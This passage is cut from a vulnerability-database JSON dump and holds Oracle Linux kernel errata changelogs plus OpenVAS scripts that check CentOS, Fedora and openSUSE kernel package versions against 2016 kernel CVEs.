1373703]\n- [acpi] acpi / ipmi: Cleanup several acpi_ipmi_device members (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Add reference counting for ACPI IPMI transfers (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Use global IPMI operation region handler (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Fix race caused by the unprotected ACPI IPMI user (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Fix race caused by the timed out ACPI IPMI transfers (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Fix race caused by the unprotected ACPI IPMI transfers (David Arcari) [1393725 1373703]\n- [acpi] acpi / ipmi: Fix potential response buffer overflow (David Arcari) [1393725 1373703]\n[3.10.0-514.9.1]\n- [drm] i915/kbl: Remove preliminary_hw_support protection from KBL. (Rob Clark) [1413092 1305702]\n- [netdrv] slip: Fix deadlock in write_wakeup (Steve Best) [1412225 1403497]\n- [netdrv] slip: fix spinlock variant (Steve Best) [1412225 1403497]\n- [kernel] kmod: use system_unbound_wq instead of khelper (Luiz Capitulino) [1411816 1395860]\n- [nvme] switch abort to blk_execute_rq_nowait (David Milburn) [1411669 1392923]\n- [netdrv] ibmveth: calculate gso_segs for large packets (Gustavo Duarte) [1411382 1361958]\n- [netdrv] ibmveth: set correct gso_size and gso_type (Gustavo Duarte) [1411382 1361958]\n- [netdrv] allow macvlans to move to net namespace (Jarod Wilson) [1409829 1368830]\n- [pci] Set Read Completion Boundary to 128 iff Root Port supports it (_HPX) (Myron Stowe) [1406290 1387674]\n- [pci] Export pcie_find_root_port() (Myron Stowe) [1406290 1387674]\n- [rtc] cmos: Initialize hpet timer before irq is registered (Pratyush Anand) [1404184 1299001]\n- [x86] amd: Fix cpu_llc_id for AMD Fam17h systems (Suravee Suthikulpanit) [1402444 1395399]\n- [powerpc] powernv: Fix stale PE primary bus (Steve Best) [1402440 1395275]\n- [misc] cxl: Fix coredump generation when cxl_get_fd() is used (Gustavo Duarte) [1402439 1397943]\n- [pci] cxl: use pcibios_free_controller_deferred() when removing vPHBs (Gustavo Duarte) [1402438 1395323]\n- [scsi] qla2xxx: do not abort all commands in the adapter during EEH recovery (Gustavo Duarte) [1402436 1393254]\n- [scsi] qla2xxx: fix invalid DMA access after command aborts in PCI device remove (Gustavo Duarte) [1402436 1393254]\n- [scsi] qla2xxx: do not queue commands when unloading (Gustavo Duarte) [1402436 1393254]\n- [net] packet: fix race condition in packet_set_ring (Hangbin Liu) [1401852 1401853] {CVE-2016-8655}\n[3.10.0-514.8.1]\n- [netdrv] i40e: Fix corruption when transferring large files (Stefan Assmann) [1413101 1404060]\n[3.10.0-514.7.1]\n- [kernel] printk: avoid livelock if another CPU printks continuously (Denys Vlasenko) [1402314 1294066]", "edition": 4, "modified": "2017-03-02T00:00:00", "published": "2017-03-02T00:00:00", "id": "ELSA-2017-0386", "href": "http://linux.oracle.com/errata/ELSA-2017-0386.html", "title": "kernel security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:52", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083", "CVE-2016-4485", "CVE-2016-4482", "CVE-2016-9576", "CVE-2016-8646"], "description": "kernel-uek\n[4.1.12-61.1.27]\n- vfio/pci: Fix integer overflows, bitmask check (Vlad Tsyrklevich) [Orabug: 25164094] {CVE-2016-9083} {CVE-2016-9084}\n- Don't feed anything but regular iovec's to blk_rq_map_user_iov (Linus Torvalds) [Orabug: 25231931] {CVE-2016-9576}\n- kvm: x86: Check memopp before dereference (CVE-2016-8630) (Owen Hofmann) [Orabug: 25417387] {CVE-2016-8630}\n- crypto: algif_hash - Only export and import on sockets with data (Herbert Xu) [Orabug: 25417799] {CVE-2016-8646}\n- USB: usbfs: fix potential infoleak in devio (Kangjie Lu) [Orabug: 25462755] {CVE-2016-4482}\n- net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462799] {CVE-2016-4485}\n[4.1.12-61.1.26]\n- xen-netback: fix extra_info handling in xenvif_tx_err() (Paul Durrant) [Orabug: 25445336] \n- net: Documentation: Fix default value tcp_limit_output_bytes (Niklas Cassel) [Orabug: 25458076] \n- tcp: double default TSQ output bytes limit (Wei Liu) [Orabug: 25458076] \n- xenbus: fix deadlock on writes to /proc/xen/xenbus (David Vrabel) [Orabug: 25430143]", "edition": 4, "modified": "2017-02-06T00:00:00", "published": "2017-02-06T00:00:00", "id": "ELSA-2017-3514", "href": "http://linux.oracle.com/errata/ELSA-2017-3514.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "description": "Check the version of kernel", "modified": "2019-03-11T00:00:00", "published": "2017-03-07T00:00:00", "id": "OPENVAS:1361412562310882673", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882673", "type": "openvas", "title": "CentOS Update for kernel CESA-2017:0386 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2017:0386 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882673\");\n script_version(\"$Revision: 14095 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-11 14:54:56 +0100 (Mon, 11 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-07 05:44:17 +0100 (Tue, 07 Mar 2017)\");\n script_cve_id(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2017:0386 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel,\nthe core of any Linux operating system.\n\nSecurity Fix(es):\n\n * Linux kernel built with the Kernel-based Virtual Machine (CONFIG_KVM)\nsupport is vulnerable to a null pointer dereference flaw. It could occur on\nx86 platform, when emulating an undefined instruction. An attacker could\nuse this flaw to crash the host kernel resulting in DoS. (CVE-2016-8630,\nImportant)\n\n * A race condition issue leading to a use-after-free flaw was found in the\nway the raw packet sockets implementation in the Linux kernel networking\nsubsystem handled synchronization while creating the TPACKET_V3 ring\nbuffer. A local user able to open a raw packet socket (requires the\nCAP_NET_RAW capability) could use this flaw to elevate their privileges on\nthe system. (CVE-2016-8655, Important)\n\n * A flaw was discovered in the Linux kernel's implementation of VFIO. An\nattacker issuing an ioctl can create a situation where memory is corrupted\nand modify memory outside of the expected area. This may overwrite kernel\nmemory and subvert kernel execution. (CVE-2016-9083, Important)\n\n * The use of a kzalloc with an integer multiplication allowed an integer\noverflow condition to be reached in vfio_pci_intrs.c. This combined with\nCVE-2016-9083 may allow an attacker to craft an attack and use unallocated\nmemory, potentially crashing the machine. (CVE-2016-9084, Moderate)\n\nRed Hat would like to thank Philip Pettersson for reporting CVE-2016-8655.\n\nAdditional Changes:\n\nSpace precludes documenting all of the bug fixes and enhancements included\nin this advisory. To see the complete list of bug fixes and enhancements,\nrefer to the linked KnowledgeBase article.\");\n\n script_tag(name:\"affected\", value:\"kernel on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:0386\");\n script_xref(name:\"URL\", value:\"https://access.redhat.com/articles/2940041\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-March/022324.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~514.10.2.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083", "CVE-2016-8645"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-02T00:00:00", "id": "OPENVAS:1361412562310810159", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810159", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-ee3a114958", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-ee3a114958\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810159\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-02 14:03:10 +0100 (Fri, 02 Dec 2016)\");\n script_cve_id(\"CVE-2016-8645\", \"CVE-2016-8630\", \"CVE-2016-9084\", \"CVE-2016-9083\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-ee3a114958\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-ee3a114958\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ERTN3R5LEVJDD6AMU5EPH27E3YQ3CJ35\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.8~100.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9084", "CVE-2016-9083"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-02T00:00:00", "id": "OPENVAS:1361412562310810170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810170", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-96d276367e", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-96d276367e\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810170\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-02 14:03:08 +0100 (Fri, 02 Dec 2016)\");\n script_cve_id(\"CVE-2016-9084\", \"CVE-2016-9083\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-96d276367e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-96d276367e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YKA5JXYKGE7LLWYWZARS2W4HUYXDWIV7\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.6~201.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-14T18:57:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7097", "CVE-2016-9794", "CVE-2016-8633", "CVE-2016-8655", "CVE-2016-9084", "CVE-2015-8962", "CVE-2015-8964", "CVE-2016-9555", "CVE-2016-8630", "CVE-2016-9178", "CVE-2015-8963", "CVE-2016-9083", "CVE-2015-8956", "CVE-2016-8646", "CVE-2016-7913", "CVE-2016-7042"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-12-09T00:00:00", "id": "OPENVAS:1361412562310851449", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851449", "type": "openvas", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2016:3058-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851449\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-12-09 05:38:55 +0100 (Fri, 09 Dec 2016)\");\n script_cve_id(\"CVE-2015-8956\", \"CVE-2015-8962\", \"CVE-2015-8963\", \"CVE-2015-8964\",\n \"CVE-2016-7042\", \"CVE-2016-7097\", \"CVE-2016-7913\", \"CVE-2016-8630\",\n \"CVE-2016-8633\", \"CVE-2016-8646\", \"CVE-2016-8655\", \"CVE-2016-9083\",\n \"CVE-2016-9084\", \"CVE-2016-9178\", \"CVE-2016-9555\", \"CVE-2016-9794\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2016:3058-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The openSUSE Leap 42.1 kernel was updated to 4.1.36 to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2016-8655: A race condition in the af_packet packet_set_ring\n function could be used by local attackers to crash the kernel or gain\n privileges (bsc#1012754).\n\n - CVE-2016-9794: A use-after-free in ALSA pcm could lead to crashes or\n allowed local users to potentially gain privileges (bsc#1013533).\n\n - CVE-2015-8962: Double free vulnerability in the sg_common_write function\n in drivers/scsi/sg.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (memory corruption and system\n crash) by detaching a device during an SG_IO ioctl call (bnc#1010501).\n\n - CVE-2016-9178: The __get_user_asm_ex macro in\n arch/x86/include/asm/uaccess.h in the Linux kernel did not initialize a\n certain integer variable, which allowed local users to obtain sensitive\n information from kernel stack memory by triggering failure of a\n get_user_ex call (bnc#1008650).\n\n - CVE-2016-7913: The xc2028_set_config function in\n drivers/media/tuners/tuner-xc2028.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service (use-after-free)\n via vectors involving omission of the firmware name from a certain data\n structure (bnc#1010478).\n\n - CVE-2016-9555: The sctp_sf_ootb function in net/sctp/sm_statefuns.c in\n the Linux kernel lacks chunk-length checking for the first chunk, which\n allowed remote attackers to cause a denial of service (out-of-bounds\n slab access) or possibly have unspecified other impact via crafted SCTP\n data (bnc#1011685).\n\n - CVE-2015-8963: Race condition in kernel/events/core.c in the Linux\n kernel allowed local users to gain privileges or cause a denial of\n service (use-after-free) by leveraging incorrect handling of an swevent\n data structure during a CPU unplug operation (bnc#1010502).\n\n - CVE-2015-8964: The tty_set_termios_ldisc function in\n drivers/tty/tty_ldisc.c in the Linux kernel allowed local users to\n obtain sensitive information from kernel memory by reading a tty data\n structure (bnc#1010507).\n\n - CVE-2016-8646: The hash_accept function in crypto/algif_hash.c in the\n Linux kernel allowed local users to cause a denial of service (OOPS) by\n attempting to trigger use of in-kernel hash algorithms for a socket that\n has received zero bytes of data (bnc#1010150).\n\n - CVE-2016-8633: drivers/firewire/net.c in the Linux kernel in certain\n unusual hardware configurations, allowed remote attackers to execute\n arbitrary code via crafted fragmented packets (bnc#1008833 ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"Kernel on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:3058-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv\", rpm:\"kernel-pv~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-base\", rpm:\"kernel-pv-base~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-base-debuginfo\", rpm:\"kernel-pv-base-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-debuginfo\", rpm:\"kernel-pv-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-debugsource\", rpm:\"kernel-pv-debugsource~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pv-devel\", rpm:\"kernel-pv-devel~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~4.1.36~38.1\", 